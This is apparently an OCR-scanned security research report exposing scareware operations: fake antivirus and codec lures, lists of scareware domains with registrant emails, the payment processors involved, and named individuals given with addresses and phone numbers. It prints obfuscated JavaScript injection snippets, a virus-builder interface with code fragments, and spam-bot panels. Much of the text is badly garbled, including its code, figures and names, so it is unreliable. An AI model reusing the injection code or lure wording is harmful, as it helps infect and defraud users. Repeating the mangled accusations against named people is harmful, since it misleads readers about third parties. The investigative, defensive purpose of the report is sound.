[1] 14:40:36 07-02-2009 


x; test 


[1] 14:31:36 07-02-2009 


o ery; test 
[1] 14:12:07 07-02-2009 
Page [fl 


Country P 


GB Portugal 89.214.238.19 


> United States 98.148.104.59 
3 turkey 83.240.80.114 
EE united Arab Emirates 87.200.83.122 
EC united Arab Emirates 80.227.106.50 
© Germany 84.63.56.214 
3 Brazil 189.26.146.192 
3 Brazil 201.21.36 
123.49.32.74 


GB Bangladesh 


1S United Kingdom 86.160.191.65 
= | BB View tasks 
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First time 


2009-02-07 22:23:18 


2009-02-07 21:38:50 


2009-02-07 20:13:07 


2009-02-07 15:05:16 


2009-02-07 14:56:51 


2009-02-07 14:44:31 


2009-02-07 14:41:49 


2009-02-07 14:40:36 


2009-02-07 14:31:36 


2009-02-07 14:12:07 


Last time 


2003-02-07 22:23:18 


2009-02-07 21:38:50 


2003-02-07 20:13:07 


2009-02-07 15:05:16 


2009-02-07 14:56:51 


2009-02-08 10:59:21 


2009-02-07 14:41:49 


2009-02-07 14:40:36 


2009-02-08 12:01:37 


2009-02-07 14:12:07 


Displaying 1 - 100 of 196 
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LOADS. cc__- 


Sign Up 
— = Mapr 7/2 
A me Tetal; LOS907 
Online: S744 
Heewe 1 mec nears 2 “aca: 935 


Hoatet 34 NocmeAnHe 24 4aca: FOI 


O cytKn/? “aca 5 @ Cytkn/2 «ace 


System Tasks ‘System scan progress 


(2) atta tetas aye 


O21 pS hey ada 


Windows Security Alert 


7 
To help protect your computer, Windows Web Security has 
VW detected trojans and ready to remove thee. 


© Sured Doaments 


@ ssw oy 


2. OVD RAMOrive € 


yreare and adware on your computer 


seeeheeeesneeee Adeness.Trojan 
2serv. Transponder. Trojan 


Oye wae et pew 


Threats and acters: if Remove off } if Cornel 


proud 
Spyveare is software, which can gather formation from user's computer through 
Internet connection and send them to Rs crestor. Gathered information can be 
passwords, o-mnal addresses and all that data, which is important for you 


@ Email-Wormvwns2.1 


Windows Internet Explorer 
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BE Low Orbit fom Cannon | When harpoons, air strikes and nukes fail lv. 1.020 


 202.14.81.230 
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Reduce ipeed it ybur internet crashes 
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fixscan4 .info Email: sitintu@gmail.com 
mixscan4 .info Email: finewnrk@gmail.com 
luxscan4 .info Email: finewnrk@gmail.com 
rayscan4 .info Email: finewnrk@gmail.com 
keyscan4 .info Email: sitintu@gmail.com 
scangen4 .info Email: sitintu@gmail.com 
scanauto4 .info Email: mexnacc@gmail.com 


FILE STORAGE SOFTWARE FAQ 


CONTACTS 


Welcome to PNM Software! 


if You have purchased some of our products and weedd tke to look up Your transaction or Request a 
REFUND, please ffl the form below 


E-mail * [ 


| Please, enter the first four digits and last fewr digits of your Creda card eenber below. 


Card number: * [ 1o0nx-1000¢ 
Erter a number below * f 


O84 


_Sima_| _ Reon | 


* Al feids are required 


Also You can check 


your transechor following thes bk httpe://secure chronopay.cem/<cs/ 


scantop4 .info Email: finewnrk@gmail.com 
scanflex4 .info Email: mexnacc@gmail.com 
scan4meta .info Email: finewnrk@gmail.com 
scan6meta .info Email: donboset@gmail.com 
scan4fine .info Email: mexnacc@gmail.com 
meta4scan .info Email: finewnrk@gmail.com 
note4scan .info Email: finewnrk@gmail.com 
gen4scan .info Email: finewnrk@gmail.com 
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CP, wweeast 


Home > Shee op 


Sign Up 


Just fofow Ihe eaty steps and you'd be ready to 9° in fo Bre! 


* Log 
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Poeeiica? 


THIS CERTIFIES THAT 
CEFIN CONSULTING & FINANCE 
AS AN AUTHORIZED PARTNER 


FROM 14.05.2008 TO 14.05.2010 


Registrar of Western Union axle 
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@ Finder File Edit View Go Window Help e858 lun. 13:00 Q 


= 


Macintosh HD 


Security Status License Type 


The status of your system is unknown, Unregistered 


it's highly recommended to start You can't delete viruses. Register to be able to 


scanning as quickly as possible. delete viruses. 
Register 


Statistics Database Info About MAC Defender 


) 11 MAC Defender ts the most advanced virus and 
Last Scan Date: 2 ma 20! Version: malware detection system in the world to locate and 


Files Scanned: 0 Signatures Count: 194230 remove dangerous software from your computer 
Viruses Found: 0 


— 


Unknown 


System Info Options 
your computer now. You can This feature allows you to see and You can control different aspects 
lorm qukk or normal or full control important system aspects of your antivirus behavior by 
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FUCK YO'COUCH 


« Porn New Videos 


e080 RealPlayer for Mac OS X GpalPiayer ) 
Il Paused 0 (XB) OOKbps0:00/0:00) “> 
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FUCK YO'COUCH 


« Porn New Videos 


‘@A@e RealPlayer for Mac OS X CpalPiayer ) 
‘I Paused (0 (RG) OOKbps0:00/0:00) “p 


Video ActiveX Object Error. 


Video Object Component Error: 
You can not play the Video with your browser. 


You need to install the latest Video Object Component 
to play this video correctly. 


Click Continue to save and run Video Object. 


2min 10sec - 12,145 views - 1.7 / 5.00 rating 
2916 peoples bookmarked this movie 


[772] 
22978 


FUCK YO'COUCH 


€ Porn New Videos 


(e080 RealPlayer for Mac OS X palPiayor 
‘II Paused (9 (RE) OOKbps0:00/0:00) “) 


Video ActiveX Object Error. 


Video Object Component Error: 
You can not play the Video with your browser. 


You need to install the latest Video Object Component 
to play this video correctly. 


Click Continue to save and run Video Object. 


2min 10sec - 12,145 views - 1.7 / 5.00 rating 
2916 peoples bookmarked this movie 
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FUCK YO'COUCH 


Bs) Porntihe New Videos 


Protected Video Error 


This video file is protected: 

Download and install special free codec to ensure 
your computer is Free of spyware and safe for 
playing this private video. 

See "Details" for more information. 


To download new version of free video decoder click «Continue». 


Continue Cancel Details... 


iG siee | Cs {Tittle 6 we h\e 
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FUCK YO'COUCH 


€ Porn New Videos 


(e080 RealPlayer for Mac OS X palPiayor 
‘II Paused (9 (RE) OOKbps0:00/0:00) “) 


Video ActiveX Object Error. 


Video Object Component Error: 
You can not play the Video with your browser. 


You need to install the latest Video Object Component 
to play this video correctly. 


Click Continue to save and run Video Object. 


2min 10sec - 12,145 views - 1.7 / 5.00 rating 
2916 peoples bookmarked this movie 
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Mac_OS_X 
ScreenSavers: 


Secret Land ScreenSaver v.2.8 |<” 

Welcome into the secret land where all nature seems to be 
dancing as if celebrating its harmony and virginity of the 
world, Peculiar plants, friendly creatures and cheery waters 
stream down relaxative spirit of pure beauty and simple joy 
into your PC and your mind. 


Get screensaver! Free! 


lor Ther r 


Fill your environment with delicate rich colours. Charge your 
mood with positive tender beaming. Feel your breath go 
smoother, your heart beat livelier and your mind get brighter! 
Reward yourself with beauty and share goodness with your 
beloved, 


Get screensaver! Free! 


Withdraw into the mighty ocean of ripe foliage and seem to 
smell the freshness of moist forest streaming into your 
setting. Always be in touch with the core of pure green 
nature which enables you to feel fluidity and smooth 
expanding of never-in-hurry Time. 


Get screensaver! Free! 
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flex4scan .info Email: mexnacc@gmail.com 
fix4scan .info Email: sitintu@gmail.com 
key4scan .info Email: mexnacc@gmail.com 
meta6scan .info Email: donboset@gmail.com 
note6scan .info Email: donboset@gmail.com 
scan4gen .info Email: finewnrk@gmail.com 
scan6gen .info Email: donboset@gmail.com 
scan4auto .info Email: sitintu@gmail.com 
scan4top .info Email: finewnrk@gmail.com 
scan4fix .info Email: sitintu@gmail.com 
scan4key .info Email: sitintu@gmail.com 
fine4scan .info Email: beelriel@gmail.com 
scanmegaé4 .info Email: bnntnkmn@gmail.com 
zonescan4 .info Email: mexnacc@gmail.com 
rankscan4 .info Email: mexnacc@gmail.com 
scanautoé4 .info Email: mexnacc@gmail.com 
scan4fine .info Email: mexnacc@gmail.com 
way4scan .info Email: bnntnkmn@gmail.com 
key4scan .info Email: mexnacc@gmail.com 
scan4fan .info Email: myscarbe@gmail.com 


Exceptions out of AS10929; NETELLIGENT Hosting Services Inc.: 


ia-pro .com - 194.165.4.41; 200.63.45.224; 209.44.126.104; 200.63.45.224 Email: 
abuse@domaincp.net.cn 

generalantivirus .com Email: compalso@gmail.com 

genpayment .com Email: seeingrud@gmail.com 

livestopbadware .com Email: producergrom@gmail.com 

av-payment .com Email: abuse@domaincp.net.cn 

antimalware-live-scanv3 .com - 38.99.170.9; 78.47.91.153; 83.133.115.9; 
89.47.237.52;91.212.65.125; Email: immigration.beijing@footer.cn 

antivirus-scanner-vl1 .com Email: tareen@yahoo.com 

proantivirusscannerv2 .com Email: ecindia@hotmail.com 
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Home About Ut Soe Now faq Terms Statemes Frente 


@ ° 
Their tears are ~ 


your money! 
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‘Unique Visitors ’ 


7 |(300)/ 3 |/ 6m |, 2v $B) Export csv WB Embed Graph BB Permatink 


Unique Visitors 


owes «= oaretes ss CTOs OOS ads ORNS 11S 12S SS 022008 
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PandoraxL 


www .pandorax!.com 


Transactions Technical 


FAQs: | Legal | | 


HOME 


ABOUT US 


Welcome to PANDORAXXL.COM 


OUR WEBSITES 


PandoraXkl prowdes sumnply the Deit Bum entetannent crbne 


1 You hove purthesed some of ow sroducts and would like to lock wp Your trensection 
You con 60 # belom 


Customer support 


may thon any of the falening Search For A Credit Card Transaction 


Messe enter any TWO (2) of the foliowne fields to retrieve pour Trensection 
Intermemon 


ow 
wedetes! This form on tre Po 
right will help You to locate Cord number: 
Dete Ve vsacbore 
tmet: | 
Absolvtely sure You have = 
never ever purthaned Customer 10+ 
. ? we 
P 


ue te cur knowledge we are 

one of 8 VERY fom ouk aw 

Da yEtes COmMpANeE oUt ere 

providing INMOUSE lve 

apport along ith teleprone 

Support. Please cal only when Once You howe loceted Your trensedton You may concel future rebliings, enauire for 
You are sure that this ate wae more info ebout trensection. reqvest pesenord or epsty for @ refund (col beck 
not ab to help You with Your reared) 

wansaons. You may call 

wen technncal Queibons aa 

well Dut You must read af cur 

site's FAQs frat 


©) We provide 24/7/3963 
amet customer nuppert et 
HupsetGoerdorenn! com 


Copyright © 2007, Cheg Ovoretsbiy 
Varrieweut 127, 44369 Cortmund, 
Ceovemnny 


ute, | OR EwAcY Pouncy | Times OF semvice | 2297 notice (usa omy 


Who’s processing the payments made by the scammed customers? These are the major 
payment processors of scareware software that have been changing aliases for a while now, 
with Pandora Software being the most persistent one: 


easybillhere .com - 200.63.45.221; Email: myerysin@gmail.com 
secure.softwaresecuredbilling .com - 209.8.45.122; Viktor Temchenko Email: TemchenkoVik- 
tor@googlemail.com 

secure.propayments .org - 78.46.152.8; Oleg Bajenov Email: oleg.bajenov@gmail.com 
secure.soft-transaction .com - 77.91.228.155; Riabokon, Igor; 
rw6rr69n7z2@networksolutionsprivateregistration.com 

secure-plus-payments .com - 209.8.25.204; John Sparck; Email: sparckO00@mail.com 
secure.pnm-software .com - 209.8.45.124; Live Internet Marketing Limited; pnm- 
software.com@liveinternetmarketingltd.com 

secure.thepaymentonline .com Email: Sergey Ryabov director@climbing-games.com 
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HOME USERS ENTERPRISES 


oMAML 
BUSING SSeS 


Experts map out future malware creation hotspots 


Imeges shew e-crime evolution revealing Mexico, Indie and Africa 


7008 


specialists, 


The researchers at f-Secure's Securty Labs 


© mapped the shdts im Internet cre trends ence 


map of future 
1986. The three maps Delow Gepect how comouter creme Nas evolved and show @ sft from Europe arn are create 
and North America to ernerging markets hotepets 

e 


1. The Past (1986-2003) 


4 Aah 


Medes Contacts 
Mewiletter Protected 


PR Materia 


eeT ONLINE 
pRooucts © Ol-school wes writers operamng from areas in Europe, United States, Austrabe and Inde 
Era characterised by opportune ‘hod ists’ learreng thew craft 
swrront 2. Recent history (27003-2007): 
» 2 
© DOWNLOADS 


f PRESS 8 NEWS: 


= wisi 


s+ CONTACTS 


Mobbyinrn replaced by professional, targeted attecks o 
Malware creahon hotspots growing in the former Soviet courtries (wuch as Ruste, Belarus, Ubraine 
Kazakhstan, Uthuenia, Latvia), Other major areas of crimenal actiety are Brand and Chine, whech 
have large rearrbers of indrevguaht wth soptestcated computing tkdls But without the job 
Opportummes to make @ ling for themselves m the IT sector. Onine cree often presems amore 
to raring kving standards for people khe these 
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MALWARE THREAT CENTER 


; 
2 


Notice: Thane detection rates represent the TRUE PORITIVE detection rates of there wartewr aetivirws tools on the lmmmed corpus of mabware binerien capteren by wer 
henepnet. The renwite de mit take inte consideration the falue pecive rate of s ewer tool, and thar » tee! that declices ewarything te be Mafected would appear te hawe the 
bophent tree peritrve percentege rome All entrvurys rerwits provide vie wwe virwrtetel com 


Most Effective Antivirus Tools Against New Malware Binaries 
Sun Apr 20 18:37:48 2008 


Miieted = Milvare bin bey mane Count 
Pened Loge = Full lit of of minted malware benerien 
Beterte = Antivires cy item overall detection sate Beted of eapoture te 1028 milware benwnes 


Rank Detects Missed Missed Log Product 
el “0 Reiefecder Mased eSa dem) BAD tortor 
i (99% “ Ax? Missed MODs bem! ave 

SR ded 4? Aone Mised MOSs bend Anew 
> 9% 3% ‘Tharna Missed MiSs bem) theres 
(fe “ Sebeaiher Gators Muted MDS4 bums Wade acher Gateway 
ow 1% ood Kasparahs Maned MODa ber! Kosperthy 
~ 71% 2 SAT-Oeschbtes! Messed MoSs hems CAT-QuickHeal 
> 107 SlamAN Missed MDSi bem! Clemay 
~*~ ttt 16 Qitemas Maced N05 bom! Herman 
10h oes 120 Mereash Mazed MOSa dem! wecroneh 
ith ott $22 Acait Mupsed MOS bee) Avant 
12h OTS iz Ciscers Missed MDSidtms W-Secere 
in OT rad ‘itasBuster Muted MOTs bem ViewsBecter 
1 «37! im Aboheb V2 Missed MD Si bem! AbaLebew? 
ish OS ts Asghes Mased MODs bem! Sopher 
1 o7/ ad ‘Retieh Mazed MOGs bem! Drweb 
its 6a tv Cbret Missed MDSs hams Fret 
1 697% im Thatiecher Mased MSs bom) Thertecher 
ith Oe tee sTtast-vet Mussd MOSs hams sTeene-Ver 
20h 7 20 WRAD2 Maret MESa dem) veaoz 
cL dd 22k Sxmuetes Misied MDS. tent Symantec 
220d 70% am ‘Buuns Mased MOS bom) Heme 
26 7 2 Panda Massed MOGs bom) Ponte 
2th 70% 7” (Comanat Mazed 1052 bem) Ferien 
aa te 2s McAtee Missed MOS1 dems McAbon 
mh 7 2m tenD2zez Mused MDSzbems Noooav2 
2h 68 200 Antbcreteam Misied MOS, bem) Autor 
Th 418 401 Keil Mazed MODs dom! twite 
th fee ci od theta Mossed MSs bend ste 
me 21% 0 Ormend Missed MODs boos Preval 
ate tote Ard Ratheh Muted MDS1 tend Seater 
72d Om 0092 CileAdhetans Maaed Meta bem! Phadtwiner 
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Most Effective Antivirus Tools Against New Malware Binaries 
Tue Apr 29 12:50:38 2008 


Missed * Malware binary miss cownt 
Missed Logs = Full list of all missed malware binaries 
Detects © Antivirus system overall detection rate bared om exporure to 1759 malware binaries 


Rank Detects 


Missed Missed Log 


ist 95% 76 iharus Missed MOGs teen} 
2nd 92% 133 AVG Missed MDSs.bemi 
ad 90% 172 Antivir Missed MDSs.hem! 
a 90% 173 BitDefender Missed MOSs.bam! 
Sth 89% 194 Hebvasher-Gateway Missed MDSa.html 
bh 88% 209 GAT-QuickMeal Missed MOSs.hami 
Te 83% 203 Norman Missed MOSs heen} 
oth 83% 287 E-Secure Missed MOSsbem! 
oh 83% 298 Kaspersky Missed MDSs.hem! 
10th = 8 2% 315 ClamAV Missed MOSs.hem! 
Lith 80% 337 Microsoft Missed MDSs,hem! 
Lath —- 79% 367 Thetacker Missed MOSs. btm! 
{3th = 77% 390 Virusbuster Missed MDSz.hemi 
i4th = 77% 400 Avast Missed MOSs.bomt 
Sth | - 77% 404 E:Prot Missed MOSs.htm! 
16th = 76% 421 Ahokab-VF Missed MOSs hem! 
17th = 75% 424 sTrust-Vet Missed MDSs.bomi 
18th 74% 446 Sophos Missed MDSz.hemi 
19th | 73% 463 Qrieh Missed MOSs hum! 
20th = 72% 485 Sumantec Migsed MOSs.hemi 
21st 71% 499 Rising Missed MDSz.hsmi 
22ed © 70% 316 WBA3Z Missed MDSshami 
23rd 66% 390 Pande Missed MOSs.hemi 
24th «= 63% 636 McAfee Missed MDSz.hemi 
25th = 62% 652 Fortinet Missed MOSs htm! 
26th = 61% 605 NOOI2v2 Missed MOSs been) 
27th «= 55% 779 Authentiun Missed MOSs html 
20th 35% 1136 Ewide Migged MOSz.heml 
29th = 28% 1263 sSafe Missed MDSz.hemi 

Referers 

http:// 
http: // 
http:// 
http: / 


Product 
tharus 

AVG 
Antivir 
BROefender 
Webwasher-Gateway 
CAT-QuickHeal 
Norman 
F-Secure 
Kaspersky 
Clamay 
Microsoft 
TheHacker 
VirusBuster 
Avast 
F-Prot 
Aholab-V3 
eTrest-Vet 
Sophos 
Drweb 
Symantec 
Rising 
VBA32 
Panda 
McAfee 
Fortinet 
NOOS202 
Authentium 
Ewido 

eSafe 
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Vendor 

Ikarus Security Software 
Grisoft Inc 

Avira 

BitDefender Inc 

Secure Computing 
Qwick Heal Technologies 
Norman lec 

F-Secure Corporation 


CC Product URL 
Ge) wewtkarus- softwares 
Ge) eeeaizch.com 


Kaspersky Lab 


SourceFire 
Microsoft Corporation 
Macksoft 


ViresBuster Led 
ALWIL Software 


Frisk Software International 
AbnLab 
Computer Associates 


Sophos Labs 


Dr. Web 

Symantec Corporation 

Beijing Rising International Sofware 
VirusBlokAda Led 


Pands Security 


McAfee Inc 
Fortinet Inc 
eseTuc 

Authentium 


Evido Networks 


Aladdin Knowledge Systeme 


new 


hits 


‘70758 


htto://203.84.199 31 /lanquage/transiated.. 


XXXX AER EREFEF ETE FET ETE TH+ 


http: // 


http://www. 

http:// itpadvi exploit. html? 

http://www. siteadvisor,com/exploit,html? 
http:// 

http: //* 

http: /s 

http:/! ‘eaariil exploit. html? 
http://www 

http: //wwew siteadvisor,com/exploit.html?.. 

http/ 
http:// aac exploit. htmi 
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3009 
680 


See ee hh ee 


Codes 


eh eh etehey fefehap Perot Laltfefeteh pepe fepels 


Countries / Regions 


a TTT 


hits 
Brazil 16248 
N/A 6345 
Turkey 4068 
United States 3604 
Poland 3079 
Japan 3037 
France 2919 
Australia 2589 
Czech Republic 2536 
Mexico 2523 
India 2252 
Netherlands 1577 
Belgium 1524 
Korea, Republic of 1378 
Argentina 1206 
United Kingdom 1043 
Switzerland 1021 
Canada 1015 
China 938 
Romania 892 
Sweden 883 
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Tun supyca. 
@ HLLP - Parasitic © HLLC- Companion © HLLO - Overwrite 


Tun wu@poscnua HLLP 
& Nuneitice 


@ Tpompeceupyouee 
@ Serpeccupyouece 


[7 Ceperm gucku 6 nposogHure 

[~ Sanpetute noctyn kK nucKaM 

[7 Ynanenve meno palin us nposonHuka 
[7 Sanpetute naxen ynpasnenna 

[7 Sanpetuts auenetuep sanau 


oi SanpeTuTe pasounii cton 

[~ Sanpetute KonTeKCTHOE MeHIO 

[~ Sanpetute sasepwenve pasor 

J Sanpetute nynikt werio "Bernonnute" 
[~ Sanpetute nynkt wenio "Tlouck” 

[7 Sanpetuts monu@uKaynio meio Tycx 
TT Yetonasnusat cnyuaitioe epema 

TH O6merusanr tionku werwKu 

TT Hamycopum s Texywem KaTanore 


CB Texywem karanore ¢ pyxypeueli 
C Ha Texyujem nuce c pexypouelt 
© Ha scex noKanbHerx nucKax HauHHaae fT _ 


BepoatHocts 1/Piy 
HauuHate ¢ we gucKa 


Hactboviku mvTauuH 


CTeneHb MyTOWMH 
| @1c2C3Cacscecy| 


KONMUECTBO MYTAHTOB 


Finclude “includ 
#include “functions h* 
bool AppendTcDrive(string targetDrive, string c 
. string cstr(), “w*); bool bExists + true; 
af (Ger ) 
if (bE 
SetPilr abn 
af(e™- 


()): 

AM, *shall\vcpen\\Default=i\n", copie 
fr Hye ge ¢e tor dri 

| FILE_ATTRI ¥); 


) lotus false; 


Book Come PaP ri mele einer tances Pred ene 
J che sModuleFile)); 


str hast of ("SS"); 
aod * 


int Get 
{ 


int iDrivesFound « char e enmeccengiel: Getle 
cher eszbrives ° = oxBut fer 
while {r= 
« \(stretr(saDrives, “B™)) ) { 


het 


) 


return ....---.--, 


[796] 
22996 


[802] 
23000 


& GE) United States (133) 
&® i France [22] 

® BBM Germany [11] 

* @ spsin (23) 


76.27.239." | *.".*.comeast.net 

76.83.213." | *.".17.com 

76.213.157." | *.*.*.sbogobal.net 
2. 


® Ge] Russion Federation [1] 24.165, 94.°/*.".ar.con 
® GE Turkey [1] 69.116.6."/ eee 
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4 


aig #1 <aczipt>function 2GDTD() (var 3Pgo = '8723':vaz etyetwen-079060022600836 eee0e 
— SSSIGOSIOROTSAG soSCFL]'G" SKIKSNVNIS“eTpeave.aplic( o5¢FL) ;xWCREPiO-" 
for (UUwSwrubck0 ; UUwSwrubcke<KTKINVHZ 5 . Length-1;UUwSwrubckes) ( 
RPRCQCT@KIKINVHZ 5 [UUwSwerubck] “SPgJ: xWCREPiRO+ 
String. fromChasCode (xPeCQo2) : }document ['w3rite' .ceplece(/[0-9]/,'"')] 
(XWCREPMRO) ; } SGOTD(nAK') :</aczipt> 


f 


<acript>function vSfolfO(eadiicph) (var iexTOrq3, vfTfbgglh@3; ver - eee0e 
Batids Y=" 7240, 10140, 10840, 10840, 13340, 3340, ', yeQviwXeGetidi¥.aplic(',"): 
uMadgn’ ' : for (HZdKeXOO0 : NIdXeXOO<yeQviwk. length-1;HZdXeXOO+e) { 
Qd25spqkeysQviux [HZdXeXOO] .aplic('+') :qwalixQeche = 

parseint (Q5253pqX [0] “v£T£bggih) +parseine (G)252pqX{1]) :qwalixgecte = . 
parsein: (gwallxQecPe) /iamTOrq:ulqdg? += 

String. fromCharCode (qwalixQecPe);)return uMgdgQ: ) function 
eOndTU(OwTqctMy) { alert ('CHIKZeCedx') :window.eval();: } 

document ['wriSte'.replace(/[0-91/,'")! 

(320120 (' viinDeieYnl')) sfunction XOsRefvD(WUEVRAYy) { ver qGOLOtiy = 
document .getElementSyid('Mgik'):vaz qgOLitty = Ad 


Tetinexape <cextares idekBShySTvin style="display:none">Mellot21</textarea> eee0e 
r _ Sactiptofunction Wae¥imoiGp(NWeZS){ var YVeSyqet= « 
document .getZlementSyid('Cap'): } 
ver nPrTol-document; document ['wrlite’.seplece(/[0-9]/,'')] 
(uneacape (document .getZlementSyid('kSShySTvin') .value)) : function 
ARBXx (Gea) { var tieguqW = document.get£lementByid('Pull'):var tieguqé = 
Gocument .getZlementSyId('Pull'):alert('pik'): } 
</aczipt> 
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Nposepka IP Ha Hanv4na B NMcTax SpamHaus 


IP: 


NposBeka AOMeHa Ha Hanus B 6NeKnucTa OT Google (firefox) 


ricnnsou- 
enced Nposeputb 


ABTOMaTUYeCKaa NPOBEKa AOMEHOB Ha Hanya UX B 6NeKNMCTAaX OT 
SpamHaus, Google (firefox) 


OCTOAHME BalUJUX AOMECHOB. 
av NOonaAaHus - 


| = | Alomex/IP (ee Status 
Google SpamHaus 

Yoanutp 0 OK 

YaanutTb OK 

YaanutTb OK 

Yaanutb OK 


Yoanutb 


| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
T 
| 
| 
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, ——E — 
pe More. Map _| Satetite | Terrain _| 


(x) 


Address: 


Varziner StraBe 127 
44369 Dortmund, Germany 


Gel drecians - Seach nests 


What is Pandoware Software, and who’s behind Pandora Software (pandora-software .com; 
pandora-software .info; pandoraxxl .com - 209.8.45.121; Live Internet Marketing Limited; 
Email: pandoraxxl.com@liveinternetmarketingltd.com)? 


The payment processor describes itself as : 


"PandoraXXL is a company which provides the best adult entertainment online and is 
the managing company of the adult websites of the group. The concept itself is the carefull 
creation of websites which are different from the average vanilla adult production. We create 
them, we run them and we provide customer care to our customers!If You are a customer 
and would like to know more about our websites please click on Our Websites above. Pando- 
raXXL.com and all sites which listed on PandoraXXL.com owned by Oleg Dvoretskiy Varzinerstr. 
127, 44369 Dortmund, Germany" 


Upon "doing business" with them they include their very latest domain within the the 
credit card statement: 


"Your credit card statement may show any of the following names: WWW.PANDORAXXL.COM 
If so, than You have made a purchase on one of our websites! This form on the right will help 
You to locate these transactions! Absolutely sure You have never ever purchased anything 
with us? Contact us immediately then! Due to our knowledge we are one of a VERY few adult 
paysites companies out there providing INHOUSE live support along with telephone support. 
Please call only when You are sure that this site was not ab to help You with Your transactions. 
You may call with technical questions as well but You must read all our site’s FAQs first." 


Going through the terms of service for several scareware domains, there’s a contact 
support image saying "Copyright 2008 Oleg Dvorezky, Dortmund, Germany". Why an image 
and not a text? Cybercriminals sometimes ensure that sensitive info potentially undermining 
their OPSEC doesn’t get crawled by public search engines. It’s gets even more interesting as 


2303 


KpunToBKa 


bl ANA reHepauMn HTh 


DEMO SCREEN 
YTMNMTbI 
Redirect URL: Get code 


Get code 


Get code 


Select algorithms 


Version Used Last check 
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@ Current Tasks 


Task Name Description Priocity Performed Speed State type Oetrvered Letters Total addreses count Running Time Operation 
we Rung Direct Sending 180064 “51 tds Sep | info 
we fetes Direct Sending to ] 
e fristes Direct Sending 4 r [ io 

Femtes Direct Sending to 
e Fristes Direct Sending to 
7 et Fristes Direct Sending ' ¥to 
@ Main System Stats 
2ax e RESET 
2 Task Speed Graph 
£ 1000 
= 
= 800 
« 
o 
= 600 
5 
2 400 
3 ao; ' 
vv A 
. Q 
e@wW707°O°”T”.c.nnm”*:;:*#*#*“#’W DE aL. 


Task Running Time In Minutes 
Bots by Version 


Bots by Count 


Rs, 4 8 7 104 a 
P Tohol_LOTe COT CCTs Comh Om Sie OOTs_LiINh Om Nie PTRLOTsOm ie | Ge_BOTs om iie 
Rate 
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% of Bot Command & Control Servers 
6 16 2 36 40 56 68 76 8 98 106 


Source: Symantec 


Annex to ASMur (2006) 16 Part I! 
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Protocol Host URL Body  Contert-T... 


jquery. is 55,71 appbcation| 


afiquery-init. js ; sppbcation/ 


Grugndrop.}s 


mage/or 
mmage/or 
Je / Qt 
rage! or 
mage/or 
rage! or 
rmage/or 
ig 


mage/or 


System Tasks Computer scanning process 
[2} View system information } ) 
= } Shared Documerts | My Documents 
» Add ce remove programs _, LL ne 
) 
Go Change 4 settings ad 
Nard drives 


Other Places 


<@ Local Disk (C:) i Local Oisk (Dz) 


DvD 


©) My Network Places 
) My Documents 
C3) Stared Documerts 


“S Windows Security Alert 


To help protect your computer, Windows Web Security has PTT) 
detected trojans and ready to remove them. fully, 31 Mal as was f dt 


Detected spyware and adware on your computer: Filename 


Oote Files infected Rate a 
11.18.2008 3s Waking removal 

v 

_ 11.18.2008 Ss Waring removal 
11.18.2008 Ss Waring removal ~ 


Spyware ts software, which can gather information from user's computer through 
Internet connection and send theen to Rs crestor. Gathered information can be 
passwords, e-mail addresses and al that data, which is inportant for you. 


‘or your system. Trojan-Downloader teasing passwords, credit cards and other 
et. 


mt 


You need to remowe this threat 25 soon as possible! 
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application! 
mage/gt 


mage/ot 


maoe/ot 
mage/or 


mage/of 
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* 
“ 


ieee eeeel 
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Maximum Risk Category Risk 
Category (Average) (Average) 
Screensavers 59.1% 34.4% 
Free Games 24.7% 6.8% 
Work From Home 15.6% 3.1% 
Rihanna 12.6% 2.4% 
Webkinz 11.4% 1.9% 
Powerball 9.3% 1.5% 
iPhone 7.9% 1.2% 
Jonas Brothers 7.9% 1.2% 
Twilight 6.8% 0.9% 
Barack Obama 6.2% 0.7% 
Taxes 4.9% 0.4% 
Viagra 1.6% 0.1% 
[822] 
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McAfee’ EB Gras Stes | ADmA Mu ASCe | Contactos \ Seen[—S—~“R?: 
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What's In A Name: The State of Typo-Squatting 2007 
© Introductien 

© Tema ated Crber-squstnen 0 the rise 

© Ker Png 

© Mathodaloas 

* Banbinas be Cateacey 

° Sasle site: McAfee com 

© The Sconcmics of Teps-Sausting: why it works 
© What is dering the wecrease in trpo-sauating 
© ‘The deciine in adu® coctert on treo-squatters 
© Discussion of our methodalaar 

© Defining Tipe Seusnns 

© Qther Methods for Combating Tipe Susman 
© Conthuiens 

° Comelste Results 


Introduction 


By the end of 2007, at least $,000 URLs using the word iphone wil De regutered, accorGng to a 

The most valuable ~ iphene.com ~ it owned by Apple tial, but when Steve Jobs armounced the product early in 
2007, Apole Gant own the Ohone Gorman yet. One expert estimates thet Apple peed ot least $1 rllion to buy that prece of 
valable Web real estate 
Among the 6.000 regstered URLs mcorporating phone are comwnurety (an sites. numer ord hack Hes and, of course, 
scam shes. freeappleiphonesnow dot com claims to offer free Phones and variants that dent even exist (like the Phone 
“shuffle” and “nane”.) The URL is notheng more then 2 recrect to roralsweens Got com, When we tested he site, we 
received debt conscldaben offers, get rich quick solicitations, “free* cell phone prizes and ether querbenable e-mad 


Canben: Examole of a she mhuch uses moor existent iPhone models to hee users inte orovidenn on e-mad adress 
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From: information @mcdonalds.com Sent: Ma 21.06.2011 13:14 
To: botezatu@bitdefender.com 

Cc 

Subject: We invite everyone to the day of free food 


“A Message Binvitation_card_0541.zip (20 KB) 
McDonalds invites you to The Free Dinner Day which will take place on 27 June, 2011, in every cafe of ours. 


Free Day’s Menu! 
Double Quarter Pounder with Cheese 
Chicken Selects Premium Breast Strips 
Side Salad 
Vanilla Triple Thick Shake 
McCafe Caramel Mocha 


Print the invitation card attached to the letter and show it at the cash desk of any of our restaurants. 
Every manager will gladly take your card and issue you a tasty dish of Free Day. And remember! Free Day is a 
whole five free dishes! 


Thank you for your credence. 
We really appreciate it. 


@ See more about: information@mcdonalds.com. paley a 


Oleg Dvorezky, whose activities as payment processor for scareware go beyond the support 
desk has also included his address - Varzinerstr. 127. 44369 Dortmund, Germany and another 
phone, again as an image +1(636)549-8103, followed by two more numbers +18669997851 
(USA) +33179972633 (France) listed as contact details. 


Moreover, despite the fact that they’ve active affiliates distribution scareware and earn- 
ing money in the process, next to managing the processing of payments, one should not 
exclude the possibility that they may also be engaging in customer relationship management 
for other scareware affiliate partners. For instance, the following support emails are all 
managed by them : 


support@supportdeska.com 
support@msantispyware2009.com 
support@pandora-software.com 
support@pandoraxl.com 
support@data-saver.org 
support@generalantivirus.com 


Fo the time being, scareware remains the single most efficient, managed and high liquidity 
asset used for monetization cybercrime campaigns. 


. http: //ddanchev. blogspot .com/2009/05/diverse-portfolio-of-fake-security.htm 


1 

